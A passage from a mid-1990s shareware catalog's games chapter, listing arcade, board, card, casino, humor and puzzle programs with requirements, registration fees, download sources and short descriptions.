640k RAM; VGA monitor; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus sound effects library. + Look for: SHOOTG33.ZIP on BBSs (call 508-788-6951 to download it + at no charge); SHOOTG.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 7 (or contact userID 71020,2613 for assistance). + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + An action/arcade game which uses 256 color MCGA graphics mode. + Seven rounds of play are included, with different targets and + objectives on each round. Rounds include arcade shooting range, + skeet, quick draw and wild west shootout. Supports SoundBlaster + for digitzed sound effects. Includes practice mode, high score + hall of fame, extensive statistics, etc. + + Chapter 17, "Games" 597 + + + + Product: SuperFly + Author: + Version: 2.1 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; bonus game hints. + Look for: SFLY21.ZIP on BBSs (call 508-788-6951 to download it at + no charge); SFLY.ZIP on CompuServe in CIS:GAMERS forum LIBrary + 7 (or contact userID 71020,2613 for assistance). + Download size: 79k (about six minutes with a 2400 baud modem) + Description: + An action game by Nels Anderson, author of Mah Jongg, EGATrek, + etc. Uses hi-res graphics mode and requires an EGA or VGA card + to play. Chase the flies and other insect invaders through 20 + different rounds. Includes 3 levels of difficulty, shell to + DOS, high score hall of fame, etc. Use mouse, joystick or + keyboard to play. + + + Product: Volcano Hunter + Save the city from the Volcano Druts. See full description on + page 595. + + Product: XFIRE: Action Puzzle game + Action Puzzle game. See full description on page 616. + + + 17.3 Board games + + 17.3.1 Backgammon + + Product: DOC DEFIANT + An original board game similar to Backgammon. See full + description on page 610. + + Chapter 17, "Games" 598 + + + + 17.3.2 Mahjong + + Product: Dragons Bane: Mah Jongg II + Author: + Version: 1.0 (06-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Strongly recommended: SVGA monitor. + Registration fee: $16.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, BBS, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 5). additional tile + sets, board layouts, background pictures. + Look for: DRGNBN10.ZIP on BBSs (call 508-788-6951 to download it + at no charge); DRGNBN.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 950k (about 71 minutes with a 2400 baud modem) + Description: + Addictive tile solitaire! Dragons Bane: Mah Jongg II is a + second generation version of the popular tile solitaire game. + It supports both SVGA and VGA graphics and SoundBlaster sound + effects. A wide variety of tiles are available and an editor is + included to make your own. The original "dragon" layout is just + one of many arrangements possible and with the built-in layout + editor there is no limit to the possibilities. Extensive + record keeping is possible for those who like statistics. + + + Product: Mah Jongg-Solitaire + Author: + Version: 4.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor; + Hercules monitor. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited BBS, CompuServe, mail support; bonus + utilities. Bonus tile sets & board layouts. + Look for: MAHJNG42.ZIP on BBSs (call 508-788-6951 to download it + at no charge); MAHJNG.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + A highly addictive solitaire game played with colorful Chinese + tiles. The challenge is to remove all the tiles from the + playing surface. It sounds easy to play (and it is), but + winning is always a challenge. The game supports EGA, VGA and + Hercules graphics, mouse or keyboard input. Supports loadable + tile sets (one extra set included) as well as an editor with + which players can create their own tiles. Also supports + different board layouts. + + Chapter 17, "Games" 599 + + + + 17.3.3 Other + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 619. + + Product: Backup + Author: , 312-922-6313 + Version: 1.4 (05-21-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; discounts on other products. Lifetime free upgrading + allowed. + Look for: BACKUP14.ZIP on BBSs (call 312-922-2839 to download it + at no charge); BACKU*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 3 (or contact userID 71532,3271 for assistance). + Download size: 144k (about eleven minutes with a 2400 baud modem) + Description: + A Windows board game where four opponents compete to become the + first to move all four pieces around the board, Along the way + pieces may be "bumped" or switched. On-line help. + + + Product: BATTLE CHARGE [***] + A two-player strategy game. See full description on page 620. + + Product: COLOR CROSS [***] + An abstract two-player strategy game. See full description on + page 621. + + Chapter 17, "Games" 600 + + + + Product: Econ's Arena + Author: + Version: 1.04 (05-18-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: XMS memory; sound card. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + Look for: availability unknown on BBSs; ECONAR.EXE on CompuServe + in CIS:GAMERS forum LIBrary 13 (or contact userID 70602,3257 + for assistance). + SWREG#: 5913 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + The elements have declared war on one another and only the + being called Econ can prevent them from destroying their world. + Play as Earth, Air, Fire, or Water on the changing terrain of + Econ's Arena. Control Ogres, Griffons, Dragons, Tritons, and + other mythological pieces. Cast spells imprisoning your foes or + protecting your troops. Play against three friends or the + computer's eight personalities. Collect your elemental tokens + and attack Econ himself... if you dare! + + + 17.4 Card games + + Product: BlackJack! + Author: , 314-458-2863 + Version: 2.50d (08-21-94) + Needs: IBM PC, DOS 2.0 or better. 350k RAM; EGA monitor; + Hercules monitor. + Registration fee: $37.50 (add $3.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + CompuServe, mail support. 6-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: BJ250.ZIP on BBSs; BJ250.ZIP on CompuServe in CIS:PCNEW + forum LIBrary 8 (or contact userID 72416,1362 for assistance). + Download size: 176k (about 13 minutes with a 2400 baud modem) + Description: + An accurate simulation of the game Blackjack as played in + American and foreign casinos. Splitting, double-down, insurance + and surrender are all supported. Completely adaptable to any + system of play. User defined count based and progressive + wagering systems. Thorough documentation, sophisticated + practice drills, and error tracking help the user reach any + level of expertise. In the words of hundreds of satisfied + users: "The best I've ever seen." Super high quality graphics. + + Chapter 17, "Games" 601 + + + + Product: Bridge Assistant [***] + Author: , 071-359-0405 + Version: 3.0 (10-01-95) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $37.50 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; BRIDGE.ZIP on CompuServe + in CIS:BRIDGE forum LIBrary 0 (or contact userID 100116,3254 + for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A bridge program for all bridge players. It enables you to + improve your game by study and practice away from the table. + Has an easy to use interface and extensive context sensitive + hlep. Can also bid, play and score for rubber bridge. + + + Product: CONTRACT BRIDGE + Author: , 813-447-0604 + Version: 2.1 (08-15-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Strongly recommended: HP LaserJet printer; Mouse; Epson + printer; math coprocessor. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 3-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: BRIDGE21.ZIP on BBSs. + Download size: 99k (about eight minutes with a 2400 baud modem) + Description: + Bids, plays and scores rubber matches of the card game + "Contract Bridge". The user bids and plays the SOUTH hand, and + if NORTH-SOUTH are declarers, the user plays both hands. + Includes the ability for user to enter hands. The program is + ideal for recreational players who enjoy informal games of + Rubber Bridge, and can be used to learn the game or sharpen + skills. On-line instructions. Mouse supported. + + Chapter 17, "Games" 602 + + + + Product: ULTIMATE GIN + Author: , 619-247-2804 + Version: 1.42 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 540k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + bonus utilities; all ASP-wide offers (see page 5); discounts on + other products. + Look for: ULTGIN.ZIP on BBSs. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + Play Gin rummy against one of 4 computer characters. Each has + his or her own style of play and abilities. You can play + standard Gin or 1 of 2 versions of "Okalhoma" gin. You can + even select "Holywood" scoring of disired. Change the points + required for game completion, all bonus scores are adjustable. + Play any player up to 40 games per match, or start a new match + with any player at any time. A unique card holder allows you + to see your hand in melds at a glance. Excellent graphics. + + + 17.4.1 Solitaire + + Product: Calculation Solitaire + Author: , 714-524-5625 + Version: 1.12 (12-23-91) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk; Mouse. + Strongly recommended: VGA monitor; Modem. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 5); disks of other shareware. + Look for: availability unknown on BBSs; CLCSOL.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 2 (or contact userID 72301,2164 for + assistance). + Download size: 72k (about six minutes with a 2400 baud modem) + Description: + A solitaire card game for Windows 3.x. All the features you've + come to expect from Windows card games, including: card + dragging, skill levels, top scores, unlimited undo, on-screen + hints, changing card backs, and more. Skill plays an important + part in this game. + + Chapter 17, "Games" 603 + + + + Product: Canfield for Windows + Author: , 714-524-5625 + Version: 1.01 (01-04-92) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $17.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 5); disks of other shareware. + Look for: availability unknown on BBSs; CANFLD.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 2 (or contact userID 72301,2164 for + assistance). + Download size: 104k (about eight minutes with a 2400 baud modem) + Description: + A solitaire card game for Windows 3.x. Lots of bells and + whistles (plus some surprises), such as: cheating, card + dragging, skill levels, top scores, unlimited undo, on-screen + hints, animated card backs, and more. + + + Product: PATIENCE 10 + Author: , 817-367-3603 + Version: 4.01 (05-21-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of mail support; 1-month return policy; bonus utilities. + 1 free update disk(s) sent out. + Look for: PATENC41.ZIP on BBSs; PATN41.ZIP on CompuServe in + DNT:KNOW forum LIBrary 0; PATENC41.ZIP on GEnie in DONT KNOW + forum LIBrary 0. + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + Features a collection of 10 popular and addictive solitaire + card games all run from a single menu. The games include: + Accordion, Canfield, Dimaryp, Eliminate, Golf, Klondike, + Nestor, Pyramid, Stacker, and Vegas. Each game features its + own resetable best scores table. Documentation covers rules + and strategies for all ten games. Screen-sensitive Help and an + Undo feature are also included. A mouse is fully supported and + custom color setup is available to registrants. + + Chapter 17, "Games" 604 + + + + Product: Patience Abroad + Author: , 817-367-3603 + Version: 1.01 (05-21-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of mail support; 1-month return policy; bonus utilities. + Look for: ABROAD11.ZIP on BBSs (call N-A to download it at no + charge); ABRD11.ZIP on CompuServe in DNT:KNOW forum LIBrary 0; + ABROAD11.ZIP on GEnie in DONT KNOW forum LIBrary 0. + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Features a collection of 9 of the best solitaire card games and + puzzles around. The games are: Beleaguered Castle, Tower of + Hanoy, Monte Carlo, Weddings, the Great Wall, Russian Patience, + Sir Tommy, Four Kingdoms, and Florentine. Each game features + its own resetable best scores table. Documentation covers rules + and examples for all games. Screen-sensitive Help and an Undo + function are also included. A mouse is fully supported and + custom color and mouse setup are available to registrants. + + + 17.5 Non-card games + + Product: BTS-Equalizer + Tutor and study aid, question file exchange. See full + description on page 455. + + 17.5.1 Solitaire + + Product: AntiC + AntiChaos puzzles. See full description on page 610. + + Product: ATC: Air Traffic Controller + Air traffic controller simulation. See full description on + page 619. + + Chapter 17, "Games" 605 + + + + Product: Equatron + Author: + Version: 2.10 (07-08-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $5.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited mail support. + Look for: availability unknown on BBSs; EQUTRN.EXE on CompuServe + in CIS:GAMERS forum LIBrary 13 (or contact userID 70602,3257 + for assistance). + Download size: 245k (about 18 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A challenging strategy game played against the computer. The + computer randomly generates a mathematical equation, which it + fills in with numbers from the game board. Your task is to beat + the computer, scoring more or less than the computer, depending + on the round. There are special tiles to help you in your task. + As the rounds progress, the stakes grow higher, and the + equations become complicated, adding more variables, operators, + parenthesis, and even exponents. Over 30 different equations. + + + Product: PEG + Peg solitaire and variations. See full description on + page 613. + + Product: Second Guess + Author: + Version: 1.1 (07-10-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; VGA monitor; Hard + disk; Mouse. + Strongly recommended: SVGA monitor. SoundBlaster or + compatible. + Registration fee: $16.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 5). Additional + tile sets & background pictures. + Look for: GUESS11.ZIP on BBSs (call 508-788-6951 to download it + at no charge); GUESS.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 860k (about 64 minutes with a 2400 baud modem) + Description: + Solitaire and more! Concentration solitaire game with every + imaginable playing option, including three board sizes, wild + cards, various scoring options and more. Also multi player + games and play versus the computer. SuperVGA graphics and + digitized sound effects for SoundBlaster. Photo backgrounds and + + Chapter 17, "Games" 606 + + + + sharp, detailed tiles for playing pieces with tile editor + included. + + + Product: Tile Match + Author: + Version: 1.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus tile sets & backgrounds. + Look for: TMATCH12.ZIP on BBSs (call 508-788-6951 to download it + at no charge); TMATCH.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + A colorful variation of concentration solitaire (also known as + memory) played with tiles. Includes many play options for a + single player, or can be played by 2 to 4 players or by a + single player against the computer. Multiple difficulty levels + and scoring options. Uses the same tile sets as Mah Jongg + solitaire and includes the TileMaker tile editing utility for + users to create their own tiles. + + + Product: WEBS + Strategy game of fast changing networks. See full description + on page 624. + + + 17.6 Casino games + + See also: Home & hobby, Gambling. + + Chapter 17, "Games" 607 + + + + Product: RoboCrap.v94 + Author: + Version: 1.00 (01-02-95) + Needs: IBM PC, DOS 2.0 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. ANSI.SYS or equivalent. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime mail support; 1-month limited + return policy; bonus utilities. + Look for: RBCRAP10.ZIP on BBSs. + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + A fully-implemented, Las Vegas-style crap table simulation with + all the action and excitement of Craps, one of the fastest + moving and most exciting games in the casino. For up to 3 + players, beginners or experienced. + + + Product: $mart Gambler + For people who play to win! See full description on page 536. + + Product: ULTIMATE BACCARAT + Author: , 619-247-2804 + Version: 2.0 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 545k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, mail support; bonus utilities; all ASP-wide + offers (see page 5); discounts on other products. + Look for: BACRAT.ZIP on BBSs. + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Enter a fully animated casino and gambling school where you + play baccarat with 3 computer characters or with up to 5 other + "human" companions. Access the game statistics, see the game + rules, adjust your mouse, adjust the game speed, and much more. + Use the Tutor to learn the game then go it on your own. Bets + are adjustable from $20 to $500. Relax and learn to play this + game as the dealer talks you through every step. But be ware. + You may never quit playing. + + Chapter 17, "Games" 608 + + + + Product: ULTIMATE BLACKJACK + Author: , 619-247-2804 + Version: 3.0 (03-15-94) + Needs: IBM PC, DOS 3.1 or better. 540k RAM; EGA monitor; Hard + disk. + Strongly recommended: Mouse. + Registration fee: $10.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, mail support; bonus utilities; all ASP-wide + offers (see page 5); discounts on other products; discounts on + upgrades. + Look for: UBJ.ZIP on BBSs. + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Enter a fully animated casino card game and gambling school + where you play solo against the dealer or with up to 4 of 12 + computer characters. Set the number of decks, change the rules + to match any casino, and monitor stats as the game progresses. + A powerful simulation feature lets you test custom strategies! + You can even use two different card counting systems. Novices + will appreciate the slick on-line tutor that suggests the best + moves. But be prepared! This game is addictive. + + + 17.7 Dungeons & Dragons + + Product: Exile: Escape From the Pit + Huge, detailed fantasy role-playing game. See full description + on page 593. + + Product: Exile: Escape From the Pit + Huge, detailed fantasy role-playing game. See full description + on page 594. + + + 17.8 Jokes & humor + + Product: Crystal Ball + Humorous computerized psychic. See full description on + page 532. + + Chapter 17, "Games" 609 + + + + Product: Curses! + Author: + Version: 3.1 (05-17-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CURSE31.ZIP on BBSs; CURSES.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A humorous, creative "insult generator" with a different twist. + A single keystroke switches from insults to compliments! + Phrases are randomly generated from your vivid vocabulary. You + control the contents, so the program can generate descriptive + phrases on any subject. + + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 384. + + Product: Practical Joke Collection + Three harmless practical jokes for DOS. See full description + on page 612. + + Product: Rev. Lowell's Treasury of Humor + Author: , 510-526-8470 + Version: 1.01 (03-01-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $18.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; bonus utilities; bonus + data; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; LOWELL.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 72340,375 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A hyper-indexed Windows 3.1 collection of great anecdotes, + funny stories, zingy one-liners, revealing quotes. Search by + topic, keywords, etc. Print or copy chosen items. Excellent + source material for speakers, writers, toastmasters, ministers! + Or just read page by page for fun! Illustrated in color & B/W. + Collected by Rev. Lowell over his 30-year career as an ordained + minister. "Very high quality material" + + Chapter 17, "Games" 610 + + + + 17.9 Logic & brain games + + Product: Ancient Yacht + An animated dice game with sound effects. See full description + on page 619. + + Product: AntiC + Author: , 206-523-6135 + Version: 1.14 (09-01-92) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; ANTICX.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (multiple files) (or contact + userID 76703,3046 for assistance). + SWREG#: 1708 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A cross between Othello and Life. Each square sends its color + to the neighboring squares in the network. If only one color + comes into a square, it takes that color. If two colors come + in, they cancel and the square assumes the third color. Each + time you change a square, all squares in the pattern are + recalculated and redrawn. change puzzles and display + + + Product: DOC DEFIANT + Author: , 810-348-6697 + Version: 1.0 (02-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $12.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; lifetime + return policy; bonus game levels; all ASP-wide offers (see + page 5). + Look for: DEFIAN10.ZIP on BBSs; DEFIAN.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 71150,1305 for + assistance). + Download size: 251k (about 19 minutes with a 2400 baud modem) + Description: + Can you stop the dastardly Doc Defiant from unleashing his + freeze ray equipped satellite against Earth? To triumph, + you'll have to defeat four of Defiant's henchmen in a board + game requiring logic and strategy. You are the planet's last + defense; don't let everyone down. Suitable for all ages. + + Chapter 17, "Games" 611 + + + + Product: MAZEMAKER for Windows + Author: , 201-228-7623 + Version: 2.01 (03-01-93) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 6-month return + policy; all ASP-wide offers (see page 5). 6-month free + upgrading allowed. + Look for: MAZEMAKR.ZIP on BBSs (call 718-837-3236 to download it + at no charge); MAZMAK.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 3 (or contact userID 72467,1255 for assistance). + Download size: 83k (about six minutes with a 2400 baud modem) + Description: + This program will challenge you with the "Maze of the Day" + which is like a house with 4-6 floors and about 2000 rooms. All + you have to do is find your way through from beginning to end. + If you can do it you are allowed to attempt progressively more + difficult mazes up to the ultimate "maze of the year!" There + are billions (with a B!) of other mazes too; some easy enough + for a young child; some not! A maze lover's dream! + + + Product: Minefield For Everybody + Author: , +972-2-830-001 + Version: 1.1 (06-01-94) + Needs: IBM PC, DOS 3.3 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Mouse. + Registration fee: $5.00 + Registration benefits: lifetime unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. + Look for: MFE110.ZIP on BBSs; MFE110.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 100274,205 for + assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + A classic minefield game that will run on any DOS system with a + 80x25 display. Supports both mouse and keyboard, has 5 preset + playfields, user definable playfiled size and difficutly, save + and load of games, 43/50 line EGA/VGA support full really big + playfields and more. Great for your old laptop or your friend's + XT! + + + Product: PentaBlox + Puzzle game for Windows. See full description on page 614. + + Product: Tangram + The anceint Chinesee jigsaw puzzle. See full description on + page 615. + + Chapter 17, "Games" 612 + + + + 17.10 Practical jokes + + Product: Practical Joke Collection + Author: + Version: 2.0 (05-13-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: PJOKES20.ZIP on BBSs; PJOKES.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + THREE PRACTICAL JOKES = HARD AT WORK ties up your computer with + a Very Important (but imaginary) task so you can take a break. + The activity on screen looks too important to be interrupted. + Conceived as a change of pace from practical joke programs that + insult the user, LOVEDOS overwhelms the user with passionate + affection. NAG is for people who need still need (or enjoy) + daily parental supervision. + + + 17.11 Puzzles, mix & match + + Product: AntiC + AntiChaos puzzles. See full description on page 610. + + Product: Cryptik + Author: , 206-523-6135 + Version: 1.4 (10-02-93) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Hard disk; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. + Look for: availability unknown on BBSs; CRYPT.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Jigsaw puzzles too easy? Try Cryptique, the coded game. The + puzzle you choose is encoded to show its major colors, then the + pieces are jumbled. You need to match the colors to restore the + image. Hall of fame for your best scores. Save puzzles, + solution hints, simple mouse interface, and much more! Designed + to use all major SVGA boards in 800 x 600 mode, but also will + work on VGA if needed. All puzzles use original photography. + + Chapter 17, "Games" 613 + + + + Product: MAGIC SQUARES + Author: + Version: 1.0.3 (09-14-93) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $5.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; 3-month return policy; bonus game + hints. + Look for: MSQU103.ZIP on BBSs; MSQ103.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 3 (or contact userID 70070,432 for + assistance). + Download size: 57k (about four minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Game fanciers will delight in solving the sliding block puzzles + of Magic Squares. You can toy with the 3x3 size, fiddle with + the 4x4 size, and agonize over the 5x5 size. Feeling + frustrated yet? No? Then accept the mental challenge of Magic + Numbers 15. Put on your thinking cap and arrange the 9 blocks + so the the block numbers add up to 15 in each row, column, and + diagonal. You can solve it in 9 moves if you're really clever. + + + Product: MAZE3 + 3D maze/cave creation and exploration game. See full + description on page 617. + + Product: Minefield For Everybody + Classic minefield game, runs on all systems. See full + description on page 611. + + Product: Palette Pleezer + Author: , 206-523-6135 + Version: 1.25 (04-10-93) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Hard disk; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; disks of + other shareware; discounts on other products. + Look for: availability unknown on BBSs; PAL.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Think concentration with colors - lots & lots of 'em! Stunning + images from around the world in SuperVGA color! But somehow, + the palette has become jumbled and it's up to you to restore + the image to its original beauty. How many times do you need to + look at the original? Start with 10 colors and work up to 99. + Great memory tester. Hall of fame for your best scores. Save + partly completed games, simple mouse interface. + + Chapter 17, "Games" 614 + + + + Product: PEG + Author: , 206-523-6135 + Version: 2.06 (09-13-93) 